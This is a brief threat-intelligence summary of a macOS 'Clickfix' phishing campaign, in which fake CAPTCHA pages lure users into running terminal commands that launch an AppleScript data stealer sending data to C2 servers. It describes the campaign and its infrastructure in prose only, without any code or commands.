Clickfix on macOS: AppleScript Stealer, Terminal Phishing, and C2 Infrastructure

Description

A sophisticated phishing campaign targeting macOS users employs a technique called Clickfix, which tricks victims into running terminal commands that execute malicious AppleScript. This script steals sensitive data including browser profiles, crypto wallets, and personal files. The attackers use fake security prompts and CAPTCHA pages on domains like cryptoinfo-news.com to appear legitimate. The stolen data is exfiltrated to command and control servers, some of which run on unusual ports. The campaign's infrastructure spans multiple regions, with several C2 servers hosted in Russia. The analysis uncovered over 50 related servers with similar configurations, suggesting a financially motivated and globally distributed operation.